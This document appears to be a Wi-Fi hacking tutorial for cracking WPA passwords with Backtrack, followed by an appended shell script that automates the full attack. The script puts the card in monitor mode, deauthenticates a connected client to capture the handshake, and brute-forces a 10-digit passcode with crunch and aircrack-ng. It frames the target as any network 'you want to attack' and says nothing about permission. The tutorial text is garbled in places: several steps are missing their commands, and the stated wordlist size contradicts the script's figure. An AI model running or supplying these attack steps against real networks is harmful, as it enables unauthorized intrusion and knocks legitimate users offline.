1. Load up Backtrack (I was using Backtrack 5 R2)
2. Open up a terminal
Type in:
That puts your wireless card into monitor mode on a new virtual interface, "mon0", which is the interface name you use from here on.
3. In the terminal window type in:
To capture a handshake (the thing we will actually be cracking) you need a client that is connected to the access point you want to attack; airodump-ng lists connected clients under the STATION column in its lower pane, so you can see whether one exists.
4. Write down the AP MAC (BSSID), the client MAC (STATION) and the channel number (CH).
Once you have those you can close the other windows.
5. In a new terminal window type in:
Now use aireplay-ng to deauthenticate the client so that it reconnects and the four-way handshake lands in the capture file; here is how we do it:
After you do that, airodump-ng should show "WPA handshake:" followed by the AP MAC in its top right corner. That's it, you're done with getting the handshake; now it's time for the long part, cracking the handshake.
Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this crunch command in Backtrack to generate that specific wordlist:
IF YOU RUN THAT CRUNCH COMMAND, BE PREPARED: IT'S A 35.7GB FILE!
After that it's your choice how to crack it. You can continue on Backtrack with pyrit, aircrack-ng, coWPAtty, etc., or even use Windows with an application like Elcomsoft Wireless Security Auditor. For aircrack-ng, run the following command:
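The whole procedure above, wrapped in a small shell script as an added example (this is not the post's own command list). It assumes the aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng) and crunch as shipped with Backtrack 5; the interface names wlan0/mon0, the output prefix "capture" and every MAC and channel are placeholders. It sanity-checks the values copied from the airodump-ng screen before firing a deauth, estimates how big a crunch wordlist will be before you write it (crunch prints the same figure before it starts), and offers a piped variant that feeds crunch straight into aircrack-ng so no multi-gigabyte file is needed at all. With DRY_RUN=1 (the default) it only prints the commands it would run.

```shell
#!/usr/bin/env bash
# Added example, not the original post's commands. Assumes the aircrack-ng
# suite and crunch from Backtrack 5; interface, MACs, channel and the output
# prefix are placeholders you replace with values from your own airodump-ng run.

IFACE="${IFACE:-wlan0}"   # physical wireless interface (assumption)
MON="${MON:-mon0}"        # monitor interface airmon-ng creates on Backtrack 5
OUT="${OUT:-capture}"     # airodump-ng -w prefix; the file becomes capture-01.cap
DRY_RUN="${DRY_RUN:-1}"   # 1 = only print the commands, 0 = execute them (needs root)

# Values copied by hand from the airodump-ng screen are easy to mistype:
# a bad MAC or channel means the deauth silently hits nothing.
is_mac() {
  printf '%s\n' "$1" | grep -Eq '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}
is_channel() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "$1" -ge 1 ] && [ "$1" -le 14 ]   # 2.4 GHz channels only
}

# Bytes crunch will write for <charset_size> symbols at lengths <min>..<max>:
# for each length, charset_size^len entries of len characters plus a newline.
wordlist_bytes() {
  cs=$1; min=$2; max=$3; total=0; len=$min
  while [ "$len" -le "$max" ]; do
    n=1; i=0
    while [ "$i" -lt "$len" ]; do n=$((n * cs)); i=$((i + 1)); done
    total=$((total + n * (len + 1)))
    len=$((len + 1))
  done
  echo "$total"
}

# Command builders: each prints the exact command line for one step.
monitor_cmd() { echo "airmon-ng start $IFACE"; }
survey_cmd()  { echo "airodump-ng $MON"; }                                 # find AP, client, channel
capture_cmd() { echo "airodump-ng -c $2 --bssid $1 -w $OUT $MON"; }        # $1 = AP MAC, $2 = channel
deauth_cmd()  { echo "aireplay-ng -0 5 -a $1 -c $2 $MON"; }                # $1 = AP MAC, $2 = client MAC
crunch_cmd()  { echo "crunch 10 10 0123456789 -o digits10.txt"; }          # full 10-digit numeric space
crack_cmd()   { echo "aircrack-ng -w digits10.txt -b $1 $OUT-01.cap"; }
# Same crack without the giant file: aircrack-ng takes the wordlist on stdin with "-w -".
crack_pipe_cmd() { echo "crunch 10 10 0123456789 | aircrack-ng -w - -b $1 $OUT-01.cap"; }

# Confirm a handshake was captured before spending hours cracking: with no
# wordlist aircrack-ng just lists the networks in the file as "WPA (1 handshake)".
has_handshake() {
  aircrack-ng "$1" </dev/null 2>/dev/null | grep -q '[1-9][0-9]* handshake'
}

run() {
  if [ "$DRY_RUN" = 1 ]; then echo "\$ $1"; else sh -c "$1"; fi
}

# Steps 1 to 5 of the post, driven from the AP MAC, client MAC and channel
# you wrote down during the survey.
attack() {
  ap=$1; client=$2; ch=$3
  is_mac "$ap"     || { echo "bad AP MAC: $ap" >&2; return 1; }
  is_mac "$client" || { echo "bad client MAC: $client" >&2; return 1; }
  is_channel "$ch" || { echo "bad channel: $ch" >&2; return 1; }
  run "$(monitor_cmd)"
  echo "# in a second terminal, leave this running: $(capture_cmd "$ap" "$ch")"
  [ "$DRY_RUN" = 1 ] || { printf 'Press Enter once airodump-ng is capturing... '; read -r _; }
  run "$(deauth_cmd "$ap" "$client")"   # kick the client so it re-associates and re-handshakes
  if [ "$DRY_RUN" != 1 ] && ! has_handshake "$OUT-01.cap"; then
    echo "no handshake in $OUT-01.cap yet; run the deauth again" >&2; return 1
  fi
  echo "# crunch -o would write $(wordlist_bytes 10 10 10) bytes; piping avoids the file:"
  run "$(crack_pipe_cmd "$ap")"
}

if [ "$#" -eq 3 ]; then attack "$@"; fi
```

Usage: `sh wpa-steps.sh 00:11:22:33:44:55 66:77:88:99:aa:bb 6` prints the plan; `DRY_RUN=0` runs it as root. Note that the full 10-digit numeric space comes out to 110,000,000,000 bytes, so always compare the estimate with your free disk space (or pipe) before letting crunch write anything.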
Just a quick run through. It's easy, but it's the cracking that will take a while. Hope they have WPS; if they do, it becomes much easier ;) There are also several wordlists available, and you can use whatever wordlist you want. Also, as long as you have the capture file you can crack it on any system. You'll want a system with a lot of processing power, RAM and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300 k/s, total crap, and will never finish].
Enjoy WPA cracking!